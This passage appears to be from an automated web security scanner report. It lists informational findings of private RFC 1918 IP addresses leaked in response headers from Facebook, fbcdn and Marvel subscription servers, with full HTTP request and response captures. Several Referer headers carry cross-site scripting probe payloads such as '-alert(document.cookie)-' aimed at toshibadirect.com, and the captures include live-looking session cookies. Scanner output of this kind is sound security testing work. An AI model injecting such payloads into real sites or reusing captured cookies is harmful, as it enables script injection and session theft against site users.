Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 11 May 2011 05:30:26 GMT
X-FB-Server: 10.30.145.199
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31141665
Expires: Thu, 10 May 2012 21:09:21 GMT
Date: Mon, 16 May 2011 10:41:36 GMT
Connection: close
Content-Length: 32644

/*1305148157,169775559*/

.DOMControl_placeholder{color:#777}
.no_js .DOMControl_placeholder{color:#000}
.DOMControl_shadow{left:-10000px;position:absolute;top:-10000px;white-space:pre-wrap}
body{back
...[SNIP]...

21.9. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z7/r/ql9vukDCc4R.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.184

Request

GET /rsrc.php/v1/z7/r/ql9vukDCc4R.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/fyAhkjMytaS.css

Response

HTTP/1.1 200 OK
Content-Length: 1177
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 06:11:23 GMT
X-FB-Server: 10.138.17.184
Cache-Control: public, max-age=30903461
Expires: Tue, 08 May 2012 02:59:21 GMT
Date: Mon, 16 May 2011 10:41:40 GMT
Connection: close

.PNG
.
...IHDR...............2...#PLTE.........444...l........6X.......fff...s.....ddd...DDDUUUQl..E.......`x.......;Y..........MMMcx.u.................bw.............uuu...............h.......Xj.
...[SNIP]...

21.10. http://subscriptions.marvel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://subscriptions.marvel.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.100.57
192.168.100.202

Request

GET / HTTP/1.1
Host: subscriptions.marvel.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmb=125179656; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:30 GMT
Server: Apache
X-server-addr: 192.168.100.57
X-trying: 192.168.100.202
X-mysql: 192.168.100.202
Vary: Accept-Encoding
X-ServerNickName: Venom
Content-Type: text/html; charset=utf-8
Content-Length: 57886

<html>
<head>
<title>Marvel Subscriptions - Home</title>
<link rel="stylesheet" href="http://i.annihil.us/u/prod/sub/i/content/outcss/1292508188-v3-i-css-subs.css" type="text/css" media="screen">

...[SNIP]...

21.11. http://subscriptions.marvel.com/checkout/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://subscriptions.marvel.com
Path:   /checkout/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.100.222
192.168.100.2

Request

GET /checkout/ HTTP/1.1
Host: subscriptions.marvel.com
Proxy-Connection: keep-alive
Referer: http://subscriptions.marvel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:36:20 GMT
Server: Apache
X-server-addr: 192.168.100.222
X-trying: 192.168.100.2
X-mysql: 192.168.100.2
Location: https://subscriptions.marvel.com/checkout/
Set-Cookie: split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm; expires=Mon, 16-May-2011 12:36:20 GMT; path=/
Vary: Accept-Encoding
X-ServerNickName: Cap
Content-Type: text/html; charset=utf-8
Content-Length: 27160

<html>
<head>
<title>Marvel Subscriptions - Checkout</title>
<link rel="stylesheet" href="http://i.annihil.us/u/prod/sub/i/content/outcss/1292508188-v3-i-css-subs.css" type="text/css" media="screen
...[SNIP]...

21.12. https://subscriptions.marvel.com/checkout/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscriptions.marvel.com
Path:   /checkout/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.100.7
192.168.100.114

Request

GET /checkout/ HTTP/1.1
Host: subscriptions.marvel.com
Connection: keep-alive
Referer: http://subscriptions.marvel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:22 GMT
Server: Apache
X-server-addr: 192.168.100.7
X-trying: 192.168.100.114
X-mysql: 192.168.100.114
Vary: Accept-Encoding
X-ServerNickName: Mj
Keep-Alive: timeout=8, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 27219

<html>
<head>
<title>Marvel Subscriptions - Checkout</title>
<link rel="stylesheet" href="https://i.annihil.us/u/prod/sub/i/content/outcss/1292508188-v3-i-css-subs.css" type="text/css" media="scree
...[SNIP]...

21.13. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.213.67

Request

GET /extern/login_status.php?api_key=194699513895760&app_id=194699513895760&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df394caa838%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c6351cfc%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df206eae43%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c396bb9%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df39c6acff%26origin%3Dhttp%253A%252F%252Fwww.bluenile.com%252Ff315278f74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc3c3701&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f3c396bb9&origin=http%3A%2F%2Fwww.bluenile.com%2Ff315278f74&relation=parent&transport=postmessage&frame=fc3c3701
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.213.67
X-Cnection: close
Date: Mon, 16 May 2011 01:55:47 GMT
Content-Length: 0


21.14. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.122.113

Request

GET /extern/login_status.php?api_key=4d15f6008d23faa991f6df49d07988c6&extern=0&channel=http%3A%2F%2Fwww.siteadvisor.com%2Fdownload%2Fwindows.html%3Fcid%3D64895%26fbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.siteadvisor.com/download/windows.html?cid=64895
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.122.113
X-Cnection: close
Date: Mon, 16 May 2011 02:06:38 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

21.15. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.126.55

Request

GET /extern/login_status.php?api_key=LikeDetail&app_id=LikeDetail&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df167f3fa48%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff3f98fefa8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df250fc0ac%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff3f98fefa8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1055a2cec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2ef19926%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff3f98fefa8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1055a2cec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df22445b1a8%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff3f98fefa8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1055a2cec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc79658d8%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff3f98fefa8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1055a2cec&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.126.55
X-Cnection: close
Date: Mon, 16 May 2011 02:03:31 GMT
Content-Length: 22

Invalid Application ID

21.16. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.29.25

Request

GET /extern/login_status.php?api_key=LikeDetail&app_id=LikeDetail&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c2f0030%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df164f97d0%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3e52e016%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1e4c4f9bc%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df346e6536%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.25
X-Cnection: close
Date: Mon, 16 May 2011 01:58:45 GMT
Content-Length: 22

Invalid Application ID

21.17. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.194.110

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.194.110
X-Cnection: close
Date: Mon, 16 May 2011 10:41:33 GMT
Content-Length: 6497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.18. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.33.23.105

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fbluefly&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.23.105
X-Cnection: close
Date: Mon, 16 May 2011 10:24:19 GMT
Content-Length: 6330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.19. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.42.234.39

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.234.39
X-Cnection: close
Date: Mon, 16 May 2011 01:53:49 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.20. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.154.119

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.154.119
X-Cnection: close
Date: Mon, 16 May 2011 10:40:47 GMT
Content-Length: 6503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.21. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.43.108.61

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.108.61
X-Cnection: close
Date: Mon, 16 May 2011 01:53:51 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.22. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.171.120

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.171.120
X-Cnection: close
Date: Mon, 16 May 2011 10:41:33 GMT
Content-Length: 6499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.23. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.189.114

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.189.114
X-Cnection: close
Date: Mon, 16 May 2011 10:41:53 GMT
Content-Length: 6486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.24. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.156.102

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.156.102
